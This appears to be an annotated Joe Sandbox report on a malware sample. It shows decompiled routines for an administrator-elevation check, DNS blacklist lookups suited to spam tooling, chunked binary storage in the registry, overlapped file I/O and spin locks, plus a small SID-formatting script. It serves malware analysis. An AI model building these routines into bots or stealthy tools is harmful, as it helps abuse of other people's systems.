                                                                                                                                  				_t12 =  *0x412048; // 0xffffffff
                                                                                                                                  				if(_t12 < 0) {
                                                                                                                                  					// _v20 (4 bytes) and _v16 (2 bytes) are adjacent and together form the 6-byte authority
                                                                                                                                  					// {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY. Sub-authorities 0x20 (SECURITY_BUILTIN_DOMAIN_RID)
                                                                                                                                  					// and 0x220 (DOMAIN_ALIAS_RID_ADMINS) give S-1-5-32-544, BUILTIN\Administrators.
                                                                                                                                  					_v20.Value = 0;
                                                                                                                                  					_v16 = 0x500;
                                                                                                                                  					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                                                                                                                  					_v8 = _t15;
                                                                                                                                  					if(_t15 != 0) {
                                                                                                                                  						_t6 =  &_v8; // 0x40702a
                                                                                                                                  						_t16 = _t6;
                                                                                                                                  						// CheckTokenMembership(NULL, sid, &IsMember): a NULL token means the caller's own
                                                                                                                                  						// effective token; _v8 receives IsMember.
                                                                                                                                  						__imp__CheckTokenMembership(0, _v12, _t16);
                                                                                                                                  						if(_t16 != 0) { // decompiler artefact: the branch tests the BOOL return value, not the pointer
                                                                                                                                  							 *0x412048 = 0 | _v8 == 0x00000000; // cached flag becomes 1 when the caller is NOT a member
                                                                                                                                  						}
                                                                                                                                  						FreeSid(_v12);
                                                                                                                                  					}
                                                                                                                                  					_t12 =  *0x412048; // 0xffffffff
                                                                                                                                  					if(_t12 != 0) {
                                                                                                                                  						// Not an administrator (or the check failed and the flag is still -1): consult a second check.
                                                                                                                                  						_t12 = E00406E36(0x12, 0);
                                                                                                                                  						 *0x412048 = _t12;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t12;
                                                                                                                                  			}

                                                                                                                                  Instruction addresses: 0x00406ee0, 0x00406eed, 0x00406f06, 0x00406f09, 0x00406f0f, 0x00406f15, 0x00406f1a, 0x00406f1c, 0x00406f1c, 0x00406f24, 0x00406f2c, 0x00406f36, 0x00406f36, 0x00406f3e, 0x00406f3e, 0x00406f44, 0x00406f4b, 0x00406f50, 0x00406f57, 0x00406f57, 0x00406f4b, 0x00406f5e

                                                                                                                                  APIs
                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                  • String ID: *p@
                                                                                                                                  • API String ID: 3429775523-2474123842
                                                                                                                                  • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                                                                  • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                                                                  • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                                                                  • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
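The SID that E00406EDD passes to CheckTokenMembership can be reconstructed from the AllocateAndInitializeSid arguments in the API log above. The following Python is an added example, not code from the sandbox report or from the sample: it renders the SID in S-1-... form and labels it. The log line is a constructed copy of the one shown above, and because the log records only a pointer (`?`) for the authority argument, the six authority bytes are taken from the decompiled locals `_v20`/`_v16` instead.

```python
"""
Render the SID built by AllocateAndInitializeSid() from the arguments recorded in a
Joe Sandbox API log line (added example; not part of the report or the sample).
"""
import re
from typing import Sequence

# Well-known SIDs from winnt.h, used only to label the result.
WELL_KNOWN_SIDS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
}


def sid_string(authority: bytes, sub_authorities: Sequence[int]) -> str:
    """Format S-1-<authority>-<sub>... from the 6-byte big-endian
    SID_IDENTIFIER_AUTHORITY and the sub-authority RIDs."""
    if len(authority) != 6:
        raise ValueError("SID_IDENTIFIER_AUTHORITY must be exactly 6 bytes")
    if not 0 < len(sub_authorities) <= 8:
        raise ValueError("AllocateAndInitializeSid accepts 1..8 sub-authorities")
    auth = int.from_bytes(authority, "big")
    # SDDL prints authorities that do not fit in 32 bits as hex; 5 (NT authority) is decimal.
    auth_str = f"0x{auth:012X}" if auth >= 2 ** 32 else str(auth)
    return "S-1-" + auth_str + "".join(f"-{s}" for s in sub_authorities)


def authority_from_decompiled_locals(v20_value: int, v16: int) -> bytes:
    """E00406EDD stores a 4-byte 0 in _v20.Value and the 16-bit value 0x500 in _v16,
    which directly follows it. Both are little-endian stores, so the six bytes read
    {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY."""
    return v20_value.to_bytes(4, "little") + v16.to_bytes(2, "little")


_API_RE = re.compile(r"AllocateAndInitializeSid\.ADVAPI32\(([^)]*)\)")


def sid_from_api_log(line: str, authority: bytes) -> str:
    """Parse the sandbox's 'AllocateAndInitializeSid.ADVAPI32(...)' argument list.
    Argument 1 is the authority pointer (logged as '?', so the caller supplies the bytes),
    argument 2 is nSubAuthorityCount, arguments 3..10 are the RIDs (hex)."""
    m = _API_RE.search(line)
    if not m:
        raise ValueError("not an AllocateAndInitializeSid log line")
    args = [a.strip() for a in m.group(1).split(",")]
    count = int(args[1], 16)
    rids = [int(a, 16) for a in args[2:2 + count]]
    return sid_string(authority, rids)


def describe(sid: str) -> str:
    """SID plus its well-known name, if any."""
    return f"{sid} ({WELL_KNOWN_SIDS.get(sid, 'not a well-known SID')})"


# Constructed copy of the API log line shown in the report above.
SAMPLE_LOG_LINE = (
    "AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,"
    "00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F"
)

if __name__ == "__main__":
    nt_authority = authority_from_decompiled_locals(0, 0x500)
    print(describe(sid_from_api_log(SAMPLE_LOG_LINE, nt_authority)))
```

One caveat when reading the cached flag: CheckTokenMembership with a NULL token evaluates the caller's effective token, and under UAC a filtered (non-elevated) administrator token carries the Administrators SID as deny-only, so IsMember is FALSE unless the process is elevated. The flag therefore reflects whether the sample is running elevated, not whether the logged-on user belongs to the group.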

                                                                                                                                  APIs
                                                                                                                                  • __getptd.LIBCMTD ref: 0042A70D
                                                                                                                                    • Part of subcall function 004174B0: __getptd_noexit.LIBCMTD ref: 004174B6
                                                                                                                                  • __getptd.LIBCMTD ref: 0042A71B
                                                                                                                                  • ___DestructExceptionObject.LIBCMTD ref: 0042A788
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd$DestructExceptionObject__getptd_noexit
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 4290476786-1018135373
                                                                                                                                  • Opcode ID: 18f22ba1b74fcc9731569e66d22ec055009045e094b273a5a82f3e0ca2ec7b3e
                                                                                                                                  • Instruction ID: 19b41c0f5f9f5006fc9355230a4f87480302ae86c7099d68876e55ecf8a42a62
                                                                                                                                  • Opcode Fuzzy Hash: 18f22ba1b74fcc9731569e66d22ec055009045e094b273a5a82f3e0ca2ec7b3e
                                                                                                                                  • Instruction Fuzzy Hash: 6A115878A00214ABCB04DF51E444A9E7BB2BF94315F94806AE8084B312C738DE92CB9A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			// Takes an IPv4 address (DWORD at ebp+8, i.e. _t105+0x78) and a comma-separated list of zone
                                                                                                                                  			// suffixes (pointer at ebp+0xc, i.e. _t105+0x7c; that stack slot is then reused as the zone index).
                                                                                                                                  			// For every zone it formats "%u.%u.%u.%u.%s" with the octets in reverse order and calls
                                                                                                                                  			// E00402684() on the result, setting bit i of the return value when that call succeeds.
                                                                                                                                  			// Reversed octets followed by a zone suffix is the DNS blacklist (DNSBL) query convention,
                                                                                                                                  			// so E00402684 is most likely a name lookup; the result is a bitmask of listings.
                                                                                                                                  			E00401C5F(void* __eflags) {
                                                                                                                                  				signed int _t49;
                                                                                                                                  				signed int _t51;
                                                                                                                                  				void* _t80;
                                                                                                                                  				char _t91;
                                                                                                                                  				void* _t92;
                                                                                                                                  				signed int _t98;
                                                                                                                                  				void* _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  				void* _t103;
                                                                                                                                  				void* _t105;
                                                                                                                                  				void* _t107;
                                                                                                                                  				void* _t108;
                                                                                                                                  
                                                                                                                                  				_t105 = _t107 - 0x70;
                                                                                                                                  				_t108 = _t107 - 0x114;
                                                                                                                                  				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000; // result bitmask = 0
                                                                                                                                  				_t98 =  *(_t105 + 0x7c); // zone list
                                                                                                                                  				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000; // zone index = 0
                                                                                                                                  				_t101 = E0040ED03(_t98, 0x2c); // 0x2c = ','; strchr-like search for the next separator
                                                                                                                                  				if(_t101 == 0) {
                                                                                                                                  					L6:
                                                                                                                                  					// Last (or only) zone, no trailing comma: two inline strlen() loops, then copy it
                                                                                                                                  					// into the local buffer at _t105-0x24 with the memcpy-like E0040EE5C(dst, src, len).
                                                                                                                                  					_t49 = _t98;
                                                                                                                                  					_t32 = _t49 + 1; // 0x2
                                                                                                                                  					_t102 = _t32;
                                                                                                                                  					do {
                                                                                                                                  						_t91 =  *_t49;
                                                                                                                                  						_t49 = _t49 + 1;
                                                                                                                                  					} while (_t91 != 0);
                                                                                                                                  					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
                                                                                                                                  					_t51 = _t98;
                                                                                                                                  					_t35 = _t51 + 1; // 0x2
                                                                                                                                  					_t103 = _t35;
                                                                                                                                  					do {
                                                                                                                                  						_t92 =  *_t51;
                                                                                                                                  						_t51 = _t51 + 1;
                                                                                                                                  					} while (_t92 != 0);
                                                                                                                                  					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
                                                                                                                                  					// Octets printed from +0x7b down to +0x78: if the DWORD is a network-order in_addr
                                                                                                                                  					// (as returned by inet_addr) this yields d.c.b.a.<zone>.
                                                                                                                                  					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
                                                                                                                                  					if(E00402684(_t105 - 0xa4) != 0) {
                                                                                                                                  						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c); // bit <zone index> = listed
                                                                                                                                  					}
                                                                                                                                  					L12:
                                                                                                                                  					return  *(_t105 + 0x6c);
                                                                                                                                  				}
                                                                                                                                  				// Pre-split the four octets for the multi-zone loop below.
                                                                                                                                  				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
                                                                                                                                  				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
                                                                                                                                  				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
                                                                                                                                  				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
                                                                                                                                  				while(1) {
                                                                                                                                  					// Copy the zone up to the comma, NUL-terminate it, advance past the comma.
                                                                                                                                  					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
                                                                                                                                  					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
                                                                                                                                  					_t22 = _t101 + 1; // 0x1
                                                                                                                                  					_t98 = _t22;
                                                                                                                                  					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
                                                                                                                                  					_t80 = E00402684(_t105 - 0xa4);
                                                                                                                                  					_t108 = _t108 + 0x2c;
                                                                                                                                  					if(_t80 != 0) {
                                                                                                                                  						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
                                                                                                                                  					}
                                                                                                                                  					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
                                                                                                                                  					if( *(_t105 + 0x7c) > 0x1e) { // at most 31 zones (bit indices 0..0x1e) are checked
                                                                                                                                  						goto L12;
                                                                                                                                  					}
                                                                                                                                  					_t101 = E0040ED03(_t98, 0x2c);
                                                                                                                                  					if(_t101 != 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				goto L12;
                                                                                                                                  			}

                                                                                                                                  Instruction addresses: 0x00401c60, 0x00401c64, 0x00401c6a, 0x00401c71, 0x00401c74, 0x00401c86, 0x00401c8c, 0x00401d1c, 0x00401d1c, 0x00401d1e, 0x00401d1e, 0x00401d21, 0x00401d21, 0x00401d23, 0x00401d24, 0x00401d2a, 0x00401d2e, 0x00401d30, 0x00401d30, 0x00401d33, 0x00401d33, 0x00401d35, 0x00401d36, 0x00401d42, 0x00401d6b, 0x00401d7e, 0x00401d88, 0x00401d88, 0x00401d8b, 0x00401d95, 0x00401d95, 0x00401c96, 0x00401c9d, 0x00401ca4, 0x00401cab, 0x00401cae, 0x00401cb3
                                                                                                                                  0x00401cbd
                                                                                                                                  0x00401cd2
                                                                                                                                  0x00401cd2
                                                                                                                                  0x00401ce1
                                                                                                                                  0x00401cea
                                                                                                                                  0x00401cef
                                                                                                                                  0x00401cf4
                                                                                                                                  0x00401cfe
                                                                                                                                  0x00401cfe
                                                                                                                                  0x00401d04
                                                                                                                                  0x00401d0a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401d14
                                                                                                                                  0x00401d1a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401d1a
                                                                                                                                  0x00000000

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: wsprintf
• String ID: %u.%u.%u.%u.%s$localcfg
• API String ID: 2111968516-120809033
• Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
• Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
• Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
• Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiler output (Joe Sandbox IDA plugin). Editor's reading: opens/creates the
   key _a8 under _a4 and stores the _a20-byte buffer _a16 as a series of REG_BINARY
   values, each at most 0xff000 bytes, named <prefix><chunk index>; the stale value
   one past the last chunk is then deleted. Returns 1 only if every chunk was written.
   _t55, _t59 and _t60 are register temporaries the decompiler left undeclared. */
E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
    int _v8;
    char* _v12;
    void* _v16;
    char _v48;
    intOrPtr* _t34;
    int _t50;
    void* _t52;
    intOrPtr _t53;
    int _t57;
    int _t58;
    void* _t59;
    void* _t60;
    void* _t61;

    _t57 = 0;
    /* 0x20106 = STANDARD_RIGHTS_READ | KEY_WOW64_64KEY | KEY_CREATE_SUB_KEY | KEY_SET_VALUE */
    if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
        return 0;
    }
    _v12 = _a16;
    _t34 = _a12;
    _t52 = _t34 + 1;
    /* inline strlen of the value-name prefix _a12 */
    do {
        _t53 =  *_t34;
        _t34 = _t34 + 1;
    } while (_t53 != 0);
    _t55 = _t34 - _t52;
    _v8 = 0;
    /* prefix is truncated to 0x1c bytes so the index still fits in the 40-byte _v48 buffer */
    if(_t34 - _t52 > 0x1c) {
        _t55 = 0x1c;
    }
    E0040EE08( &_v48, _a12, _t55);
    _t50 = _a20;
    _t61 = _t60 + 0xc;
    if(_t50 <= _t57) {
        L11:
        /* E0040F1ED is likely an integer-to-string routine (base 0xa) writing the chunk index after the prefix */
        E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
        RegDeleteValueA(_v16,  &_v48);
        RegCloseKey(_v16);
        return 0 | _t50 == _t57;
    } else {
        while(1) {
            /* write at most 0xff000 bytes per value */
            _t58 = 0xff000;
            if(_t50 < 0xff000) {
                _t58 = _t50;
            }
            E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
            _t61 = _t61 + 0xc;
            /* type 3 = REG_BINARY */
            if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
                break;
            }
            _v12 =  &(_v12[_t58]);
            _t50 = _t50 - _t58;
            _v8 = _v8 + 1;
            if(_t50 > 0) {
                continue;
            }
            break;
        }
        _t57 = 0;
        goto L11;
    }
}


APIs
• RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
• RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0040E127
• RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,004122F8), ref: 0040E158
• RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: Value$CloseCreateDelete
• String ID:
• API String ID: 2667537340-0
• Opcode ID: 638dec105df7dcb1f365d34fe073c8f8fa39a9ad738abc938cf50ffa02a2619f
• Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
• Opcode Fuzzy Hash: 638dec105df7dcb1f365d34fe073c8f8fa39a9ad738abc938cf50ffa02a2619f
• Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiler output (Joe Sandbox IDA plugin). Editor's reading: overlapped WriteFile
   of _a12 bytes from _a8 to handle _a4, using event _a16 and waiting up to _a20 ms
   if the write is still pending. Returns 1 only when all _a12 bytes were written.
   Note the WaitForSingleObject result is never checked, so a timeout still falls
   through to a non-blocking GetOverlappedResult. */
E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
    struct _OVERLAPPED _v24;
    long _t30;
    void* _t31;

    _v24.Offset = _v24.Offset & 0x00000000;
    _v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
    _t30 = _a12;
    _t31 = _a16;
    _a16 = _a16 & 0x00000000;   /* _a16 is reused as the bytes-written out-parameter */
    _v24.hEvent = _t31;
    if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
        L3:
        if(_t30 != _a16) {
            L5:
            return 0;
        }
        return 1;
    }
    /* 0x3e5 = ERROR_IO_PENDING */
    if(GetLastError() != 0x3e5) {
        goto L5;
    }
    WaitForSingleObject(_t31, _a20);
    if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
        goto L5;
    }
    goto L3;
}

Addresses: 0x00403f1e 0x00403f22 0x00403f27 0x00403f2b 0x00403f2e 0x00403f3e 0x00403f4c 0x00403f7c 0x00403f7f 0x00403f86 0x00000000 0x00403f86 0x00000000 0x00403f83 0x00403f59 0x00000000 0x00000000 0x00403f5f 0x00403f7a 0x00000000 0x00000000 0x00000000

APIs
• WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
• GetLastError.KERNEL32 ref: 00403F4E
• WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
• String ID:
• API String ID: 3373104450-0
• Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
• Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
• Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
• Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
	struct _OVERLAPPED _v24;
	long _t30;
	void* _t31;

	_v24.Offset = _v24.Offset & 0x00000000;
	_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
	_t30 = _a12;
	_t31 = _a16;
	_a16 = _a16 & 0x00000000;
	_v24.hEvent = _t31;
	if(ReadFile(_a4, _a8, _t30, &_a16, &_v24) != 0) {
		L3:
		if(_t30 != _a16) {
			L5:
			return 0;
		}
		return 1;
	}
	if(GetLastError() != 0x3e5) {
		goto L5;
	}
	WaitForSingleObject(_t31, _a20);
	if(GetOverlappedResult(_a4, &_v24, &_a16, 0) == 0) {
		goto L5;
	}
	goto L3;
}

Addresses: 0x00403f92 0x00403f96 0x00403f9b 0x00403f9f 0x00403fa2 0x00403fb2 0x00403fc0 0x00403ff0 0x00403ff3 0x00403ffa 0x00000000 0x00403ffa 0x00000000 0x00403ff7 0x00403fcd 0x00000000 0x00000000 0x00403fd3 0x00403fee 0x00000000 0x00000000 0x00000000

APIs
• ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
• GetLastError.KERNEL32 ref: 00403FC2
• WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
• String ID:
• API String ID: 888215731-0
• Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
• Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
• Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
• Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040A4C7(intOrPtr _a4) {
	long _t3;
	LONG* _t8;
	long _t9;

	_t9 = GetTickCount();
	_t8 = _a4 + 0x5c;
	while(1) {
		_t3 = InterlockedExchange(_t8, 1);
		if(_t3 == 0) {
			break;
		}
		_t3 = GetTickCount() - _t9;
		if(_t3 < 0x1388) {
			Sleep(0);
			continue;
		}
		break;
	}
	return _t3;
}

Addresses: 0x0040a4dd 0x0040a4df 0x0040a4f7 0x0040a4fa 0x0040a4fe 0x00000000 0x00000000 0x0040a4e6 0x0040a4ed 0x0040a4f1 0x00000000 0x0040a4f1 0x00000000 0x0040a4ed 0x0040a504

APIs
• GetTickCount.KERNEL32 ref: 0040A4D1
• GetTickCount.KERNEL32 ref: 0040A4E4
• Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
• InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: CountTick$ExchangeInterlockedSleep
• String ID:
• API String ID: 2207858713-0
• Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
• Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
• Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
• Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00404E92(void* __ecx) {
	long _t2;
	void* _t7;
	LONG* _t8;
	long _t9;

	_t7 = __ecx;
	_t9 = GetTickCount();
	_t8 = _t7 + 4;
	while(1) {
		_t2 = InterlockedExchange(_t8, 1);
		if(_t2 == 0) {
			break;
		}
		_t2 = GetTickCount() - _t9;
		if(_t2 < 0x2710) {
			Sleep(0xa);
			continue;
		}
		break;
	}
	return _t2;
}

Addresses: 0x00404e9c 0x00404ea6 0x00404ea8 0x00404ec0 0x00404ec3 0x00404ec7 0x00000000 0x00000000 0x00404eaf 0x00404eb6 0x00404eba 0x00000000 0x00404eba 0x00000000 0x00404eb6 0x00404ecd

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                                                                  • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                                                                  • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                                                                  • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404BD1(void* __ecx) {
                                                                                                                                  				long _t2;
                                                                                                                                  				void* _t7;
                                                                                                                                  				LONG* _t8;
                                                                                                                                  				long _t9;
                                                                                                                                  
                                                                                                                                  				_t7 = __ecx;
                                                                                                                                  				_t9 = GetTickCount();
                                                                                                                                  				_t8 = _t7 + 0xc;
                                                                                                                                  				while(1) {
                                                                                                                                  					_t2 = InterlockedExchange(_t8, 1);
                                                                                                                                  					if(_t2 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t2 = GetTickCount() - _t9;
                                                                                                                                  					if(_t2 < 0x1388) {
                                                                                                                                  						Sleep(0);
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;
                                                                                                                                  				}
                                                                                                                                  				return _t2;
                                                                                                                                  			}







Statement addresses, in source order (0x00000000 marks a line that emits no instruction of its own): 0x00404bdb 0x00404be5 0x00404be7 0x00404bff 0x00404c02 0x00404c06 0x00000000 0x00000000 0x00404bee 0x00404bf5 0x00404bf9 0x00000000 0x00404bf9 0x00000000 0x00404bf5 0x00404c0c

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404BEC
